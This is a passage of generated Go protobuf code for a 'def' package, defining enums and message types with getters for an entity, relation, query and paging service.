map[int32]string{ 0: "StateDeleted", 1: "StatePrivate", 2: "State1", 3: "State2", 4: "State3", 5: "StateFriend", 6: "StatePublic", } var State_value = map[string]int32{ "StateDeleted": 0, "StatePrivate": 1, "State1": 2, "State2": 3, "State3": 4, "StateFriend": 5, "StatePublic": 6, } func (x State) String() string { return proto.EnumName(State_name, int32(x)) } func (State) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{1} } type Op int32 const ( Op_Eq Op = 0 Op_Gt Op = 1 Op_Ge Op = 2 Op_Lt Op = 3 Op_Le Op = 4 Op_Ne Op = 5 Op_In Op = 6 ) var Op_name = map[int32]string{ 0: "Eq", 1: "Gt", 2: "Ge", 3: "Lt", 4: "Le", 5: "Ne", 6: "In", } var Op_value = map[string]int32{ "Eq": 0, "Gt": 1, "Ge": 2, "Lt": 3, "Le": 4, "Ne": 5, "In": 6, } func (x Op) String() string { return proto.EnumName(Op_name, int32(x)) } func (Op) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{2} } type UpdateAction int32 const ( UpdateAction_Set UpdateAction = 0 UpdateAction_Incr UpdateAction = 1 UpdateAction_Add UpdateAction = 2 UpdateAction_Remove UpdateAction = 3 ) var UpdateAction_name = map[int32]string{ 0: "Set", 1: "Incr", 2: "Add", 3: "Remove", } var UpdateAction_value = map[string]int32{ "Set": 0, "Incr": 1, "Add": 2, "Remove": 3, } func (x UpdateAction) String() string { return proto.EnumName(UpdateAction_name, int32(x)) } func (UpdateAction) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{3} } type ValueType int32 const ( ValueType_String ValueType = 0 ValueType_Int64 ValueType = 1 ValueType_Int ValueType = 2 ValueType_Double ValueType = 3 ValueType_Bool ValueType = 4 ValueType_Bytes ValueType = 5 ) var ValueType_name = map[int32]string{ 0: "String", 1: "Int64", 2: "Int", 3: "Double", 4: "Bool", 5: "Bytes", } var ValueType_value = map[string]int32{ "String": 0, "Int64": 1, "Int": 
2, "Double": 3, "Bool": 4, "Bytes": 5, } func (x ValueType) String() string { return proto.EnumName(ValueType_name, int32(x)) } func (ValueType) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{4} } type SortDir int32 const ( SortDir_Asc SortDir = 0 SortDir_Desc SortDir = 1 ) var SortDir_name = map[int32]string{ 0: "Asc", 1: "Desc", } var SortDir_value = map[string]int32{ "Asc": 0, "Desc": 1, } func (x SortDir) String() string { return proto.EnumName(SortDir_name, int32(x)) } func (SortDir) EnumDescriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{5} } type RType struct { From string `protobuf:"bytes,1,opt,name=from,proto3" json:"from,omitempty"` To string `protobuf:"bytes,2,opt,name=to,proto3" json:"to,omitempty"` Verb string `protobuf:"bytes,3,opt,name=verb,proto3" json:"verb,omitempty"` Multiple bool `protobuf:"varint,4,opt,name=multiple,proto3" json:"multiple,omitempty"` CountType CountType `protobuf:"varint,5,opt,name=countType,proto3,enum=def.CountType" json:"countType,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *RType) Reset() { *m = RType{} } func (m *RType) String() string { return proto.CompactTextString(m) } func (*RType) ProtoMessage() {} func (*RType) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{0} } func (m *RType) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_RType.Unmarshal(m, b) } func (m *RType) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_RType.Marshal(b, m, deterministic) } func (m *RType) XXX_Merge(src proto.Message) { xxx_messageInfo_RType.Merge(m, src) } func (m *RType) XXX_Size() int { return xxx_messageInfo_RType.Size(m) } func (m *RType) XXX_DiscardUnknown() { xxx_messageInfo_RType.DiscardUnknown(m) } var xxx_messageInfo_RType proto.InternalMessageInfo func (m *RType) GetFrom() string { if m != nil { return m.From } return "" } func (m *RType) GetTo() string { if m != nil { return m.To } return "" } func (m *RType) GetVerb() string { if m != nil { return m.Verb } return "" } func (m *RType) GetMultiple() bool { if m != nil { return m.Multiple } return false } func (m *RType) GetCountType() CountType { if m != nil { return m.CountType } return CountType_CountBoth } type EType struct { Name string `protobuf:"bytes,1,opt,name=name,proto3" json:"name,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EType) Reset() { *m = EType{} } func (m *EType) String() string { return proto.CompactTextString(m) } func (*EType) ProtoMessage() {} func (*EType) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{1} } func (m *EType) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EType.Unmarshal(m, b) } func (m *EType) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EType.Marshal(b, m, deterministic) } func (m *EType) XXX_Merge(src proto.Message) { xxx_messageInfo_EType.Merge(m, src) } func (m *EType) XXX_Size() int { return xxx_messageInfo_EType.Size(m) } func (m *EType) XXX_DiscardUnknown() { xxx_messageInfo_EType.DiscardUnknown(m) } var xxx_messageInfo_EType proto.InternalMessageInfo func (m *EType) GetName() string { if m != nil { return m.Name } return "" } type E struct { Type string `protobuf:"bytes,1,opt,name=Type,proto3" json:"Type,omitempty"` ID string `protobuf:"bytes,2,opt,name=ID,proto3" json:"ID,omitempty"` ID1 
string `protobuf:"bytes,3,opt,name=ID1,proto3" json:"ID1,omitempty"` ID2 string `protobuf:"bytes,4,opt,name=ID2,proto3" json:"ID2,omitempty"` ID3 string `protobuf:"bytes,5,opt,name=ID3,proto3" json:"ID3,omitempty"` CTime int64 `protobuf:"varint,6,opt,name=CTime,proto3" json:"CTime,omitempty"` UTime int64 `protobuf:"varint,7,opt,name=UTime,proto3" json:"UTime,omitempty"` State State `protobuf:"varint,8,opt,name=State,proto3,enum=def.State" json:"State,omitempty"` Tags []string `protobuf:"bytes,9,rep,name=Tags,proto3" json:"Tags,omitempty"` Meta map[string]string `protobuf:"bytes,10,rep,name=Meta,proto3" json:"Meta,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` Content map[string]string `protobuf:"bytes,11,rep,name=Content,proto3" json:"Content,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` Score int64 `protobuf:"varint,12,opt,name=Score,proto3" json:"Score,omitempty"` Score1 int64 `protobuf:"varint,13,opt,name=Score1,proto3" json:"Score1,omitempty"` Resources []string `protobuf:"bytes,14,rep,name=Resources,proto3" json:"Resources,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *E) Reset() { *m = E{} } func (m *E) String() string { return proto.CompactTextString(m) } func (*E) ProtoMessage() {} func (*E) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{2} } func (m *E) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_E.Unmarshal(m, b) } func (m *E) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_E.Marshal(b, m, deterministic) } func (m *E) XXX_Merge(src proto.Message) { xxx_messageInfo_E.Merge(m, src) } func (m *E) XXX_Size() int { return xxx_messageInfo_E.Size(m) } func (m *E) XXX_DiscardUnknown() { xxx_messageInfo_E.DiscardUnknown(m) } var xxx_messageInfo_E proto.InternalMessageInfo func (m *E) GetType() string { if m != nil { return m.Type } return "" } func (m *E) GetID() string { if m != nil { return m.ID } return "" } func (m *E) GetID1() string { if m != nil { return m.ID1 } return "" } func (m *E) GetID2() string { if m != nil { return m.ID2 } return "" } func (m *E) GetID3() string { if m != nil { return m.ID3 } return "" } func (m *E) GetCTime() int64 { if m != nil { return m.CTime } return 0 } func (m *E) GetUTime() int64 { if m != nil { return m.UTime } return 0 } func (m *E) GetState() State { if m != nil { return m.State } return State_StateDeleted } func (m *E) GetTags() []string { if m != nil { return m.Tags } return nil } func (m *E) GetMeta() map[string]string { if m != nil { return m.Meta } return nil } func (m *E) GetContent() map[string]string { if m != nil { return m.Content } return nil } func (m *E) GetScore() int64 { if m != nil { return m.Score } return 0 } func (m *E) GetScore1() int64 { if m != nil { return m.Score1 } return 0 } func (m *E) GetResources() []string { if m != nil { return m.Resources } return nil } type DefineETypeReq struct { EType *EType `protobuf:"bytes,1,opt,name=eType,proto3" json:"eType,omitempty"` CreationRTypes []*RType `protobuf:"bytes,2,rep,name=creationRTypes,proto3" json:"creationRTypes,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *DefineETypeReq) Reset() { *m = DefineETypeReq{} } func (m *DefineETypeReq) String() string { return proto.CompactTextString(m) } func (*DefineETypeReq) ProtoMessage() {} func 
(*DefineETypeReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{3} } func (m *DefineETypeReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_DefineETypeReq.Unmarshal(m, b) } func (m *DefineETypeReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_DefineETypeReq.Marshal(b, m, deterministic) } func (m *DefineETypeReq) XXX_Merge(src proto.Message) { xxx_messageInfo_DefineETypeReq.Merge(m, src) } func (m *DefineETypeReq) XXX_Size() int { return xxx_messageInfo_DefineETypeReq.Size(m) } func (m *DefineETypeReq) XXX_DiscardUnknown() { xxx_messageInfo_DefineETypeReq.DiscardUnknown(m) } var xxx_messageInfo_DefineETypeReq proto.InternalMessageInfo func (m *DefineETypeReq) GetEType() *EType { if m != nil { return m.EType } return nil } func (m *DefineETypeReq) GetCreationRTypes() []*RType { if m != nil { return m.CreationRTypes } return nil } type CreateEWithRsReq struct { E *E `protobuf:"bytes,1,opt,name=e,proto3" json:"e,omitempty"` Related []*E `protobuf:"bytes,2,rep,name=related,proto3" json:"related,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *CreateEWithRsReq) Reset() { *m = CreateEWithRsReq{} } func (m *CreateEWithRsReq) String() string { return proto.CompactTextString(m) } func (*CreateEWithRsReq) ProtoMessage() {} func (*CreateEWithRsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{4} } func (m *CreateEWithRsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_CreateEWithRsReq.Unmarshal(m, b) } func (m *CreateEWithRsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_CreateEWithRsReq.Marshal(b, m, deterministic) } func (m *CreateEWithRsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_CreateEWithRsReq.Merge(m, src) } func (m *CreateEWithRsReq) XXX_Size() int { return xxx_messageInfo_CreateEWithRsReq.Size(m) } func (m *CreateEWithRsReq) XXX_DiscardUnknown() { xxx_messageInfo_CreateEWithRsReq.DiscardUnknown(m) } var xxx_messageInfo_CreateEWithRsReq proto.InternalMessageInfo func (m *CreateEWithRsReq) GetE() *E { if m != nil { return m.E } return nil } func (m *CreateEWithRsReq) GetRelated() []*E { if m != nil { return m.Related } return nil } type RelationReq struct { From *E `protobuf:"bytes,1,opt,name=from,proto3" json:"from,omitempty"` To *E `protobuf:"bytes,2,opt,name=to,proto3" json:"to,omitempty"` Verb string `protobuf:"bytes,3,opt,name=verb,proto3" json:"verb,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *RelationReq) Reset() { *m = RelationReq{} } func (m *RelationReq) String() string { return proto.CompactTextString(m) } func (*RelationReq) ProtoMessage() {} func (*RelationReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{5} } func (m *RelationReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_RelationReq.Unmarshal(m, b) } func (m *RelationReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_RelationReq.Marshal(b, m, deterministic) } func (m *RelationReq) XXX_Merge(src proto.Message) { xxx_messageInfo_RelationReq.Merge(m, src) } func (m *RelationReq) XXX_Size() int { return xxx_messageInfo_RelationReq.Size(m) } func (m *RelationReq) XXX_DiscardUnknown() { xxx_messageInfo_RelationReq.DiscardUnknown(m) } var xxx_messageInfo_RelationReq proto.InternalMessageInfo func (m *RelationReq) GetFrom() *E { 
if m != nil { return m.From } return nil } func (m *RelationReq) GetTo() *E { if m != nil { return m.To } return nil } func (m *RelationReq) GetVerb() string { if m != nil { return m.Verb } return "" } type GetByIDsReq struct { Type string `protobuf:"bytes,1,opt,name=type,proto3" json:"type,omitempty"` Ids []string `protobuf:"bytes,2,rep,name=ids,proto3" json:"ids,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *GetByIDsReq) Reset() { *m = GetByIDsReq{} } func (m *GetByIDsReq) String() string { return proto.CompactTextString(m) } func (*GetByIDsReq) ProtoMessage() {} func (*GetByIDsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{6} } func (m *GetByIDsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_GetByIDsReq.Unmarshal(m, b) } func (m *GetByIDsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_GetByIDsReq.Marshal(b, m, deterministic) } func (m *GetByIDsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_GetByIDsReq.Merge(m, src) } func (m *GetByIDsReq) XXX_Size() int { return xxx_messageInfo_GetByIDsReq.Size(m) } func (m *GetByIDsReq) XXX_DiscardUnknown() { xxx_messageInfo_GetByIDsReq.DiscardUnknown(m) } var xxx_messageInfo_GetByIDsReq proto.InternalMessageInfo func (m *GetByIDsReq) GetType() string { if m != nil { return m.Type } return "" } func (m *GetByIDsReq) GetIds() []string { if m != nil { return m.Ids } return nil } type EList struct { List []*E `protobuf:"bytes,1,rep,name=list,proto3" json:"list,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *EList) Reset() { *m = EList{} } func (m *EList) String() string { return proto.CompactTextString(m) } func (*EList) ProtoMessage() {} func (*EList) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{7} } func (m *EList) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_EList.Unmarshal(m, b) } func (m *EList) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_EList.Marshal(b, m, deterministic) } func (m *EList) XXX_Merge(src proto.Message) { xxx_messageInfo_EList.Merge(m, src) } func (m *EList) XXX_Size() int { return xxx_messageInfo_EList.Size(m) } func (m *EList) XXX_DiscardUnknown() { xxx_messageInfo_EList.DiscardUnknown(m) } var xxx_messageInfo_EList proto.InternalMessageInfo func (m *EList) GetList() []*E { if m != nil { return m.List } return nil } type Empty struct { XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Empty) Reset() { *m = Empty{} } func (m *Empty) String() string { return proto.CompactTextString(m) } func (*Empty) ProtoMessage() {} func (*Empty) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{8} } func (m *Empty) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Empty.Unmarshal(m, b) } func (m *Empty) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Empty.Marshal(b, m, deterministic) } func (m *Empty) XXX_Merge(src proto.Message) { xxx_messageInfo_Empty.Merge(m, src) } func (m *Empty) XXX_Size() int { return xxx_messageInfo_Empty.Size(m) } func (m *Empty) XXX_DiscardUnknown() { xxx_messageInfo_Empty.DiscardUnknown(m) } var xxx_messageInfo_Empty proto.InternalMessageInfo type HasRelationResp struct { Has bool `protobuf:"varint,1,opt,name=has,proto3" json:"has,omitempty"` 
XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *HasRelationResp) Reset() { *m = HasRelationResp{} } func (m *HasRelationResp) String() string { return proto.CompactTextString(m) } func (*HasRelationResp) ProtoMessage() {} func (*HasRelationResp) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{9} } func (m *HasRelationResp) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_HasRelationResp.Unmarshal(m, b) } func (m *HasRelationResp) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_HasRelationResp.Marshal(b, m, deterministic) } func (m *HasRelationResp) XXX_Merge(src proto.Message) { xxx_messageInfo_HasRelationResp.Merge(m, src) } func (m *HasRelationResp) XXX_Size() int { return xxx_messageInfo_HasRelationResp.Size(m) } func (m *HasRelationResp) XXX_DiscardUnknown() { xxx_messageInfo_HasRelationResp.DiscardUnknown(m) } var xxx_messageInfo_HasRelationResp proto.InternalMessageInfo func (m *HasRelationResp) GetHas() bool { if m != nil { return m.Has } return false } type Query struct { Field string `protobuf:"bytes,1,opt,name=Field,proto3" json:"Field,omitempty"` Op Op `protobuf:"varint,2,opt,name=Op,proto3,enum=def.Op" json:"Op,omitempty"` Value string `protobuf:"bytes,3,opt,name=Value,proto3" json:"Value,omitempty"` ValueType ValueType `protobuf:"varint,4,opt,name=ValueType,proto3,enum=def.ValueType" json:"ValueType,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Query) Reset() { *m = Query{} } func (m *Query) String() string { return proto.CompactTextString(m) } func (*Query) ProtoMessage() {} func (*Query) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{10} } func (m *Query) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Query.Unmarshal(m, b) } func (m *Query) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Query.Marshal(b, m, deterministic) } func (m *Query) XXX_Merge(src proto.Message) { xxx_messageInfo_Query.Merge(m, src) } func (m *Query) XXX_Size() int { return xxx_messageInfo_Query.Size(m) } func (m *Query) XXX_DiscardUnknown() { xxx_messageInfo_Query.DiscardUnknown(m) } var xxx_messageInfo_Query proto.InternalMessageInfo func (m *Query) GetField() string { if m != nil { return m.Field } return "" } func (m *Query) GetOp() Op { if m != nil { return m.Op } return Op_Eq } func (m *Query) GetValue() string { if m != nil { return m.Value } return "" } func (m *Query) GetValueType() ValueType { if m != nil { return m.ValueType } return ValueType_String } type Limit struct { From string `protobuf:"bytes,1,opt,name=From,proto3" json:"From,omitempty"` Limit int32 `protobuf:"varint,2,opt,name=Limit,proto3" json:"Limit,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Limit) Reset() { *m = Limit{} } func (m *Limit) String() string { return proto.CompactTextString(m) } func (*Limit) ProtoMessage() {} func (*Limit) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{11} } func (m *Limit) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Limit.Unmarshal(m, b) } func (m *Limit) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Limit.Marshal(b, m, deterministic) } func (m *Limit) XXX_Merge(src proto.Message) { xxx_messageInfo_Limit.Merge(m, src) } func (m *Limit) 
XXX_Size() int { return xxx_messageInfo_Limit.Size(m) } func (m *Limit) XXX_DiscardUnknown() { xxx_messageInfo_Limit.DiscardUnknown(m) } var xxx_messageInfo_Limit proto.InternalMessageInfo func (m *Limit) GetFrom() string { if m != nil { return m.From } return "" } func (m *Limit) GetLimit() int32 { if m != nil { return m.Limit } return 0 } type Update struct { Field string `protobuf:"bytes,1,opt,name=Field,proto3" json:"Field,omitempty"` Action UpdateAction `protobuf:"varint,2,opt,name=Action,proto3,enum=def.UpdateAction" json:"Action,omitempty"` Value string `protobuf:"bytes,3,opt,name=Value,proto3" json:"Value,omitempty"` ValueType ValueType `protobuf:"varint,4,opt,name=ValueType,proto3,enum=def.ValueType" json:"ValueType,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Update) Reset() { *m = Update{} } func (m *Update) String() string { return proto.CompactTextString(m) } func (*Update) ProtoMessage() {} func (*Update) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{12} } func (m *Update) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Update.Unmarshal(m, b) } func (m *Update) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Update.Marshal(b, m, deterministic) } func (m *Update) XXX_Merge(src proto.Message) { xxx_messageInfo_Update.Merge(m, src) } func (m *Update) XXX_Size() int { return xxx_messageInfo_Update.Size(m) } func (m *Update) XXX_DiscardUnknown() { xxx_messageInfo_Update.DiscardUnknown(m) } var xxx_messageInfo_Update proto.InternalMessageInfo func (m *Update) GetField() string { if m != nil { return m.Field } return "" } func (m *Update) GetAction() UpdateAction { if m != nil { return m.Action } return UpdateAction_Set } func (m *Update) GetValue() string { if m != nil { return m.Value } return "" } func (m *Update) GetValueType() ValueType { if m != nil { return m.ValueType } return ValueType_String } type Paged struct { List []*E `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` HasMore bool `protobuf:"varint,2,opt,name=HasMore,proto3" json:"HasMore,omitempty"` NextFrom string `protobuf:"bytes,3,opt,name=NextFrom,proto3" json:"NextFrom,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Paged) Reset() { *m = Paged{} } func (m *Paged) String() string { return proto.CompactTextString(m) } func (*Paged) ProtoMessage() {} func (*Paged) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{13} } func (m *Paged) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Paged.Unmarshal(m, b) } func (m *Paged) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Paged.Marshal(b, m, deterministic) } func (m *Paged) XXX_Merge(src proto.Message) { xxx_messageInfo_Paged.Merge(m, src) } func (m *Paged) XXX_Size() int { return xxx_messageInfo_Paged.Size(m) } func (m *Paged) XXX_DiscardUnknown() { xxx_messageInfo_Paged.DiscardUnknown(m) } var xxx_messageInfo_Paged proto.InternalMessageInfo func (m *Paged) GetList() []*E { if m != nil { return m.List } return nil } func (m *Paged) GetHasMore() bool { if m != nil { return m.HasMore } return false } func (m *Paged) GetNextFrom() string { if m != nil { return m.NextFrom } return "" } type PagedIDs struct { List []string `protobuf:"bytes,1,rep,name=List,proto3" json:"List,omitempty"` HasMore bool `protobuf:"varint,2,opt,name=HasMore,proto3" 
json:"HasMore,omitempty"` NextFrom string `protobuf:"bytes,3,opt,name=NextFrom,proto3" json:"NextFrom,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *PagedIDs) Reset() { *m = PagedIDs{} } func (m *PagedIDs) String() string { return proto.CompactTextString(m) } func (*PagedIDs) ProtoMessage() {} func (*PagedIDs) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{14} } func (m *PagedIDs) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_PagedIDs.Unmarshal(m, b) } func (m *PagedIDs) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_PagedIDs.Marshal(b, m, deterministic) } func (m *PagedIDs) XXX_Merge(src proto.Message) { xxx_messageInfo_PagedIDs.Merge(m, src) } func (m *PagedIDs) XXX_Size() int { return xxx_messageInfo_PagedIDs.Size(m) } func (m *PagedIDs) XXX_DiscardUnknown() { xxx_messageInfo_PagedIDs.DiscardUnknown(m) } var xxx_messageInfo_PagedIDs proto.InternalMessageInfo func (m *PagedIDs) GetList() []string { if m != nil { return m.List } return nil } func (m *PagedIDs) GetHasMore() bool { if m != nil { return m.HasMore } return false } func (m *PagedIDs) GetNextFrom() string { if m != nil { return m.NextFrom } return "" } type CountByState struct { Counts map[string]int64 `protobuf:"bytes,1,rep,name=counts,proto3" json:"counts,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"varint,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *CountByState) Reset() { *m = CountByState{} } func (m *CountByState) String() string { return proto.CompactTextString(m) } func (*CountByState) ProtoMessage() {} func (*CountByState) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{15} } func (m *CountByState) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_CountByState.Unmarshal(m, b) } func (m *CountByState) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_CountByState.Marshal(b, m, deterministic) } func (m *CountByState) XXX_Merge(src proto.Message) { xxx_messageInfo_CountByState.Merge(m, src) } func (m *CountByState) XXX_Size() int { return xxx_messageInfo_CountByState.Size(m) } func (m *CountByState) XXX_DiscardUnknown() { xxx_messageInfo_CountByState.DiscardUnknown(m) } var xxx_messageInfo_CountByState proto.InternalMessageInfo func (m *CountByState) GetCounts() map[string]int64 { if m != nil { return m.Counts } return nil } type Counts struct { Counts map[string]*CountByState `protobuf:"bytes,1,rep,name=counts,proto3" json:"counts,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *Counts) Reset() { *m = Counts{} } func (m *Counts) String() string { return proto.CompactTextString(m) } func (*Counts) ProtoMessage() {} func (*Counts) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{16} } func (m *Counts) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_Counts.Unmarshal(m, b) } func (m *Counts) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_Counts.Marshal(b, m, deterministic) } func (m *Counts) XXX_Merge(src proto.Message) { xxx_messageInfo_Counts.Merge(m, src) } func (m *Counts) XXX_Size() int { return xxx_messageInfo_Counts.Size(m) } func (m *Counts) 
XXX_DiscardUnknown() { xxx_messageInfo_Counts.DiscardUnknown(m) } var xxx_messageInfo_Counts proto.InternalMessageInfo func (m *Counts) GetCounts() map[string]*CountByState { if m != nil { return m.Counts } return nil } type HasRelationsReq struct { From *E `protobuf:"bytes,1,opt,name=from,proto3" json:"from,omitempty"` To *E `protobuf:"bytes,2,opt,name=to,proto3" json:"to,omitempty"` Relations []string `protobuf:"bytes,3,rep,name=relations,proto3" json:"relations,omitempty"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *HasRelationsReq) Reset() { *m = HasRelationsReq{} } func (m *HasRelationsReq) String() string { return proto.CompactTextString(m) } func (*HasRelationsReq) ProtoMessage() {} func (*HasRelationsReq) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{17} } func (m *HasRelationsReq) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_HasRelationsReq.Unmarshal(m, b) } func (m *HasRelationsReq) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_HasRelationsReq.Marshal(b, m, deterministic) } func (m *HasRelationsReq) XXX_Merge(src proto.Message) { xxx_messageInfo_HasRelationsReq.Merge(m, src) } func (m *HasRelationsReq) XXX_Size() int { return xxx_messageInfo_HasRelationsReq.Size(m) } func (m *HasRelationsReq) XXX_DiscardUnknown() { xxx_messageInfo_HasRelationsReq.DiscardUnknown(m) } var xxx_messageInfo_HasRelationsReq proto.InternalMessageInfo func (m *HasRelationsReq) GetFrom() *E { if m != nil { return m.From } return nil } func (m *HasRelationsReq) GetTo() *E { if m != nil { return m.To } return nil } func (m *HasRelationsReq) GetRelations() []string { if m != nil { return m.Relations } return nil } type HasRelations struct { Relations map[string]bool `protobuf:"bytes,1,rep,name=relations,proto3" json:"relations,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"varint,2,opt,name=value,proto3"` XXX_NoUnkeyedLiteral struct{} `json:"-"` XXX_unrecognized []byte `json:"-"` XXX_sizecache int32 `json:"-"` } func (m *HasRelations) Reset() { *m = HasRelations{} } func (m *HasRelations) String() string { return proto.CompactTextString(m) } func (*HasRelations) ProtoMessage() {} func (*HasRelations) Descriptor() ([]byte, []int) { return fileDescriptor_0d2c4ccf1453ffdb, []int{18} } func (m *HasRelations) XXX_Unmarshal(b []byte) error { return xxx_messageInfo_HasRelations.Unmarshal(m, b) } func (m *HasRelations) XXX_Marshal(b []byte, deterministic bool) ([]byte, error) { return xxx_messageInfo_HasRelations.Marshal(b, m, deterministic) } func (m *HasRelations) XXX_Merge(src proto.Message) { xxx_messageInfo_HasRelations.Merge(m, src) } func (m *HasRelations) XXX_Size() int { return 